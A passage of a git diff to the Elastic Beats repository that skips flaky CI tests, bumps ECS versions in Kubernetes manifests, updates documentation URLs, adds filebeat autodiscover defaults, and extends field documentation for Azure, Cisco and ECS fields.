cAMgcK4EEeSZaAWWaSWhD5ieZTPJYL05IiCvye9cOYxR6j9t90z6aXUrTvlG+6NtqMPPaA1MHWccLzozv+qtij37AC95RTLhohiPP0sfN/vnTGRnJWwx1wekstwIk9xE9zrPKfVbZoJ0x628jBtugwO+WKs/i1vinuR4xoX1BlYwIqQs3eeWSypfdmOOaasEbqr+FVzRW5Fale2nWE54yQrXOeD/XLn+hSdYppnN+H/28NQwSvYGmPaYxSokBbLDDITMHh74ifa7NNBH5MOYQnSQN5W+5YpW7H8X0cHmwDBeCBQtAL87NhBy4Rv5w5ZtB1qStTAVCkkykUtysObvDdDk7GQmLKhHcC5ClVG4soe1+4ciyibwVqaSJ9a5G5INIp8EwKp9Y04vbSi4tcsMpOhDeH51qNv5txDJ2ksmxKlgmCoZwtOIDB2klbU1IXe/48ZS6PDOJ6+MbBSar/cESV0nV1vLKsQWC2b7QksSMSxSjWTwKTRPUIi06RoOo8SJUQJ2pSdUCGHvHZ+YFe4Fb5E7CCjaqX+EdX4UYVcW5Npu8FUXjA1mKfwh7GS08LIz0RnlszCDVgUvdVx4/tG2CIrPgKA/sf3bD0gfmKELM2gvMCyNHf/tbwwLcK1I/Yx2IwM9Iqk5X7wnIEz7bT1sOyDaPuhoTlbFnMUzg7JqD+MEMp0dVMpcMm8UGE1D2u4Q35IxCYbH5kD/xzy+VAtVpnk6G6ogiKIHuxgyxbqLE7CFtm6E6MWYbcIv7P2vzFVSZQZfHDtzAKIreVJS2mTzSM48ulT2CGZ7OGcFgz8AUONpX4YdwqudihXBMpMb/CgAA//8nX2DV" } diff --git a/auditbeat/module/file_integrity/metricset_test.go b/auditbeat/module/file_integrity/metricset_test.go index 60766d7c141..aad49679c49 100644 --- a/auditbeat/module/file_integrity/metricset_test.go +++ b/auditbeat/module/file_integrity/metricset_test.go @@ -65,6 +65,8 @@ func TestData(t *testing.T) { } func TestActions(t *testing.T) { + skipOnCIForDarwinAMD64(t) + defer abtest.SetupDataDir(t)() bucket, err := datastore.OpenBucket(bucketName) @@ -173,6 +175,8 @@ func TestActions(t *testing.T) { } func TestExcludedFiles(t *testing.T) { + skipOnCIForDarwinAMD64(t) + defer abtest.SetupDataDir(t)() bucket, err := datastore.OpenBucket(bucketName) @@ -227,6 +231,8 @@ func TestExcludedFiles(t *testing.T) { } func TestIncludedExcludedFiles(t *testing.T) { + skipOnCIForDarwinAMD64(t) + defer abtest.SetupDataDir(t)() bucket, err := datastore.OpenBucket(bucketName) @@ -980,3 +986,9 @@ func getConfig(path ...string) map[string]interface{} { "exclude_files": []string{`(?i)\.sw[nop]$`, `[/\\]\.git([/\\]|$)`}, } } + +func skipOnCIForDarwinAMD64(t testing.TB) { + if os.Getenv("BUILD_ID") != "" && runtime.GOOS == "darwin" && runtime.GOARCH == "amd64" { + t.Skip("Skip test on CI for darwin/amd64") + } +} diff --git a/auditbeat/tests/system/test_file_integrity.py b/auditbeat/tests/system/test_file_integrity.py index bf90a9ee38e..8b47f9b22e9 100644 --- a/auditbeat/tests/system/test_file_integrity.py +++ b/auditbeat/tests/system/test_file_integrity.py @@ -1,5 +1,6 @@ import time import unittest +import platform from auditbeat import * @@ -61,6 +62,8 @@ def wait_output(self, min_events): else: break + @unittest.skipIf(os.getenv("BUILD_ID") is not None and platform.system() == 'Darwin', + 'Flaky test: https://github.com/elastic/beats/issues/24678') def test_non_recursive(self): """ file_integrity monitors watched directories (non recursive). @@ -130,7 +133,7 @@ def test_non_recursive(self): # assert file inside subdir is not reported assert self.log_contains(file3) is False - @unittest.skip("Skipped as flaky: https://github.com/elastic/beats/issues/7731") + @unittest.skipIf(os.getenv("BUILD_ID") is not None, "Skipped as flaky: https://github.com/elastic/beats/issues/7731") def test_recursive(self): """ file_integrity monitors watched directories (recursive). diff --git a/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml index 4118e2d4e80..cf867d43ad3 100644 --- a/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml +++ b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml @@ -24,10 +24,7 @@ spec: containers: - name: elastic-agent image: docker.elastic.co/beats/elastic-agent:8.0.0 - args: [ - "-c", "/etc/agent.yml", - "-e", - ] + args: ["-c", "/etc/agent.yml", "-e"] env: - name: ES_USERNAME value: "elastic" @@ -134,7 +131,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - data_stream: dataset: system.syslog type: logs @@ -150,7 +147,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - name: container-log type: logfile use_output: default @@ -401,10 +398,7 @@ spec: containers: - name: elastic-agent image: docker.elastic.co/beats/elastic-agent:8.0.0 - args: [ - "-c", "/etc/agent.yml", - "-e", - ] + args: ["-c", "/etc/agent.yml", "-e"] env: - name: ES_USERNAME value: "elastic" @@ -659,3 +653,4 @@ metadata: labels: k8s-app: elastic-agent --- + diff --git a/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml b/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml index f7f412a5e19..17fa1c99dae 100644 --- a/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml +++ b/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml @@ -50,7 +50,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - data_stream: dataset: system.syslog type: logs @@ -66,7 +66,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - name: container-log type: logfile use_output: default diff --git a/dev-tools/common.bash b/dev-tools/common.bash index 72940c0591e..9439e15e93d 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash @@ -91,6 +91,10 @@ jenkins_setup() { # Workaround for Python virtualenv path being too long. export TEMP_PYTHON_ENV=$(mktemp -d) + + # Workaround for cryptography package (pip dependency) relying on rust + export CRYPTOGRAPHY_DONT_BUILD_RUST=1 + export PYTHON_ENV="${TEMP_PYTHON_ENV}/python-env" # Write cached magefile binaries to workspace to ensure diff --git a/dev-tools/mage/pytest.go b/dev-tools/mage/pytest.go index e562fdef95b..f933300f935 100644 --- a/dev-tools/mage/pytest.go +++ b/dev-tools/mage/pytest.go @@ -192,6 +192,12 @@ func PythonVirtualenv() (string, error) { pythonVirtualenvLock.Lock() defer pythonVirtualenvLock.Unlock() + // When upgrading pip we might run into an error with the cryptography package + // (pip dependency) will not compile if no recent rust development environment is available. + // We set `CRYPTOGRAPHY_DONT_BUILD_RUST=1`, to disable the need for python. + // See: https://github.com/pyca/cryptography/issues/5771 + os.Setenv("CRYPTOGRAPHY_DONT_BUILD_RUST", "1") + // Determine the location of the virtualenv. ve, err := pythonVirtualenvPath() if err != nil { diff --git a/dev-tools/mage/settings.go b/dev-tools/mage/settings.go index 9640af73e27..5134a24e22d 100644 --- a/dev-tools/mage/settings.go +++ b/dev-tools/mage/settings.go @@ -73,7 +73,7 @@ var ( BeatDescription = EnvOr("BEAT_DESCRIPTION", "") BeatVendor = EnvOr("BEAT_VENDOR", "Elastic") BeatLicense = EnvOr("BEAT_LICENSE", "ASL 2.0") - BeatURL = EnvOr("BEAT_URL", "https://www.elastic.co/products/beats/"+BeatName) + BeatURL = EnvOr("BEAT_URL", "https://www.elastic.co/beats/"+BeatName) BeatUser = EnvOr("BEAT_USER", "root") BeatProjectType ProjectType diff --git a/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl b/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl index 4ee5f6c2e5a..812bc978199 100644 --- a/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl +++ b/dev-tools/packaging/templates/deb/elastic-agent.init.sh.tmpl @@ -7,7 +7,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO # Do NOT "set -e" diff --git a/dev-tools/packaging/templates/deb/init.sh.tmpl b/dev-tools/packaging/templates/deb/init.sh.tmpl index 90d026dd0ba..b30e29d40a1 100644 --- a/dev-tools/packaging/templates/deb/init.sh.tmpl +++ b/dev-tools/packaging/templates/deb/init.sh.tmpl @@ -7,7 +7,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO # Do NOT "set -e" diff --git a/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl b/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl index eb5a96e878d..573f0c9496b 100644 --- a/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl +++ b/dev-tools/packaging/templates/rpm/elastic-agent.init.sh.tmpl @@ -14,7 +14,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO diff --git a/dev-tools/packaging/templates/rpm/init.sh.tmpl b/dev-tools/packaging/templates/rpm/init.sh.tmpl index bfdf44fff9c..1bd3a846705 100644 --- a/dev-tools/packaging/templates/rpm/init.sh.tmpl +++ b/dev-tools/packaging/templates/rpm/init.sh.tmpl @@ -14,7 +14,7 @@ # Default-Stop: 0 1 6 # Short-Description: {{.Description}} # Description: {{.BeatName | title}} is a shipper part of the Elastic Beats -# family. Please see: https://www.elastic.co/products/beats +# family. Please see: https://www.elastic.co/beats ### END INIT INFO diff --git a/docs/devguide/newbeat.asciidoc b/docs/devguide/newbeat.asciidoc index a7f239f22fc..56677b5d619 100644 --- a/docs/devguide/newbeat.asciidoc +++ b/docs/devguide/newbeat.asciidoc @@ -138,7 +138,7 @@ For the `github_name`, enter your github id. The `beat` and `beat_path` are set --------- Enter a project name [examplebeat]: Countbeat Enter a github name [your-github-name]: {username} -Enter a beat path [github.com/{username}/countbeat]: +Enter a beat path [github.com/{username}/countbeat]: Enter a full name [Firstname Lastname]: {Full Name} Enter the github.com/elastic/beats revision [master]: --------- @@ -162,7 +162,7 @@ To fetch dependencies and set up the Beat, run: [source,shell] --------- cd ${GOPATH}/src/github.com/{user}/countbeat -make setup +make update --------- The Beat now contains the basic config file, `countbeat.yml`, and template files. The Beat is "complete" in the sense @@ -340,7 +340,7 @@ countbeat: - `period`: Defines how often to send out events -The config file is generated when you run `make setup` to <>. The file contains +The config file is generated when you run `make update` to <>. The file contains basic configuration information. To add configuration options to your Beat, you need to update the Go structures in `config/config.go` and add the corresponding config options to `_meta/beat.yml`. diff --git a/filebeat/Dockerfile b/filebeat/Dockerfile index 27c59548eb2..1e8fd395a95 100644 --- a/filebeat/Dockerfile +++ b/filebeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/filebeat/README.md b/filebeat/README.md index b47e54f4138..893d35e5e21 100644 --- a/filebeat/README.md +++ b/filebeat/README.md @@ -3,7 +3,7 @@ Filebeat is an open source file harvester, mostly used to fetch logs files and feed them into logstash. Together with the libbeat lumberjack output is a replacement for [logstash-forwarder](https://github.com/elastic/logstash-forwarder). -To learn more about Filebeat, check out https://www.elastic.co/products/beats/filebeat. +To learn more about Filebeat, check out https://www.elastic.co/beats/filebeat. ## Quick start diff --git a/filebeat/autodiscover/defaults.go b/filebeat/autodiscover/defaults.go new file mode 100644 index 00000000000..701241ba625 --- /dev/null +++ b/filebeat/autodiscover/defaults.go @@ -0,0 +1,30 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package autodiscover + +import ( + "time" + + "github.com/elastic/beats/v7/libbeat/autodiscover/providers/docker" + "github.com/elastic/beats/v7/libbeat/autodiscover/providers/kubernetes" +) + +func init() { + docker.DefaultCleanupTimeout = 60 * time.Second + kubernetes.DefaultCleanupTimeout = 60 * time.Second +} diff --git a/filebeat/autodiscover/imports.go b/filebeat/autodiscover/imports.go new file mode 100644 index 00000000000..561c2395ac4 --- /dev/null +++ b/filebeat/autodiscover/imports.go @@ -0,0 +1,22 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package autodiscover + +import ( + _ "github.com/elastic/beats/v7/filebeat/autodiscover/builder/hints" +) diff --git a/filebeat/beater/filebeat.go b/filebeat/beater/filebeat.go index 837fc341a79..41b15b1543c 100644 --- a/filebeat/beater/filebeat.go +++ b/filebeat/beater/filebeat.go @@ -54,8 +54,8 @@ import ( _ "github.com/elastic/beats/v7/filebeat/processor/add_kubernetes_metadata" _ "github.com/elastic/beats/v7/libbeat/processors/decode_csv_fields" - // include all filebeat specific builders - _ "github.com/elastic/beats/v7/filebeat/autodiscover/builder/hints" + // include all filebeat specific autodiscover features + _ "github.com/elastic/beats/v7/filebeat/autodiscover" ) const pipelinesWarning = "Filebeat is unable to load the Ingest Node pipelines for the configured" + diff --git a/filebeat/docs/configuring-howto.asciidoc b/filebeat/docs/configuring-howto.asciidoc index 4a2799c87aa..8bd08a838ef 100644 --- a/filebeat/docs/configuring-howto.asciidoc +++ b/filebeat/docs/configuring-howto.asciidoc @@ -60,7 +60,6 @@ include::./filebeat-filtering.asciidoc[] :autodiscoverHints: :autodiscoverNomad: include::{libbeat-dir}/shared-autodiscover.asciidoc[] -:autodiscoverNomad!: include::{libbeat-dir}/queueconfig.asciidoc[] diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index 3ab9d5718fe..e59ddb41c00 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -3569,6 +3569,124 @@ type: keyword Status +type: keyword + +-- + +*`azure.signinlogs.properties.authentication_requirement_policies`*:: ++ +-- +Set of CA policies that apply to this sign-in, each as CA: policy name, and/or MFA: Per-user. + + +type: keyword + +-- + +*`azure.signinlogs.properties.applied_conditional_access_policies`*:: ++ +-- +Details of the conditional access policies being applied for the sign-in. + + +type: nested + +-- + +*`azure.signinlogs.properties.resource_tenant_id`*:: ++ +-- +The resource tenantId for B2B(business-to-business) scenarios. + + +type: keyword + +-- + +*`azure.signinlogs.properties.authentication_details`*:: ++ +-- +A record of each step of authentication undertaken in the sign-in. + + +type: nested + +-- + +*`azure.signinlogs.properties.authentication_processing_details`*:: ++ +-- +Provides the details associated with authentication processor. + + +type: flattened + +-- + +*`azure.signinlogs.properties.flagged_for_review`*:: ++ +-- +Event was flagged for review. + +type: boolean + +-- + +*`azure.signinlogs.properties.network_location_details`*:: ++ +-- +Provides the details associated with authentication processor. + + +type: keyword + +-- + +*`azure.signinlogs.properties.risk_event_types`*:: ++ +-- +The list of risk event types associated with the sign-in. + + +type: keyword + +-- + +*`azure.signinlogs.properties.risk_event_types_v2`*:: ++ +-- +The list of risk event types associated with the sign-in. + + +type: keyword + +-- + +*`azure.signinlogs.properties.authentication_requirement`*:: ++ +-- +Type of authentication required for the sign-in. If set to multiFactorAuthentication, an MFA step was required. If set to singleFactorAuthentication, no MFA was required + + +type: keyword + +-- + +*`azure.signinlogs.properties.resource_id`*:: ++ +-- +ID of the resource that the user signed into. + + +type: keyword + +-- + +*`azure.signinlogs.properties.user_type`*:: ++ +-- +User type. + type: keyword -- @@ -9072,6 +9190,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-bluecoat]] == Blue Coat Director fields @@ -21080,7 +21207,7 @@ type: keyword -- -*`cisco.amp.file.archived_file.identify.sha256`*:: +*`cisco.amp.file.archived_file.identity.sha256`*:: + -- SHA256 hash of the archived file related to the malicious event. @@ -21290,12 +21417,52 @@ type: flattened -- +*`cisco.amp.mitre_tactics`*:: ++ +-- +Array of all related mitre tactic ID's + + +type: keyword + +-- + *`cisco.amp.techniques`*:: + -- List of all MITRE techniques related to the incident found. +type: flattened + +-- + +*`cisco.amp.mitre_techniques`*:: ++ +-- +Array of all related mitre technique ID's + + +type: keyword + +-- + +*`cisco.amp.command_line.arguments`*:: ++ +-- +The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + +type: keyword + +-- + +*`cisco.amp.bp_data`*:: ++ +-- +Endpoint isolation information + + type: flattened -- @@ -21615,6 +21782,26 @@ type: keyword The total count of burst rate hits since the object was created or cleared +type: keyword + +-- + +*`cisco.asa.termination_user`*:: ++ +-- +AAA name of user requesting termination + + +type: keyword + +-- + +*`cisco.asa.webvpn.group_name`*:: ++ +-- +The WebVPN group name the user belongs to + + type: keyword -- @@ -21833,6 +22020,26 @@ type: keyword The assigned DAP records +type: keyword + +-- + +*`cisco.ftd.termination_user`*:: ++ +-- +AAA name of user requesting termination + + +type: keyword + +-- + +*`cisco.ftd.webvpn.group_name`*:: ++ +-- +The WebVPN group name the user belongs to + + type: keyword -- @@ -39719,6 +39926,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -39776,6 +39994,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -39798,6 +40028,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -39811,9 +40052,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -40128,6 +40372,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -40145,6 +40401,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -40168,6 +40436,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -40334,6 +40614,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -40391,6 +40682,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -40413,6 +40716,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -40426,9 +40740,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -40647,6 +40964,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -40670,6 +40999,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -40730,6 +41071,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -41475,6 +41825,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -41498,6 +41860,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -41646,6 +42020,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -42136,6 +42519,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -42193,6 +42587,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -42215,6 +42621,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -42252,8 +42669,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -42292,6 +42710,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -42310,6 +42737,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -42333,6 +42789,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -42390,6 +42857,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -42412,6 +42891,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -42445,10 +42935,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -42461,6 +42954,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -42738,6 +43267,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -43271,7 +43812,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -43335,7 +43876,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -43354,6 +43895,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -43411,6 +43963,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -43433,6 +43997,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -43445,7 +44020,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -43509,7 +44084,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -43529,10 +44104,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -44102,6 +44680,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -44125,6 +44715,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -44247,6 +44849,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -44301,6 +44912,18 @@ example: true -- 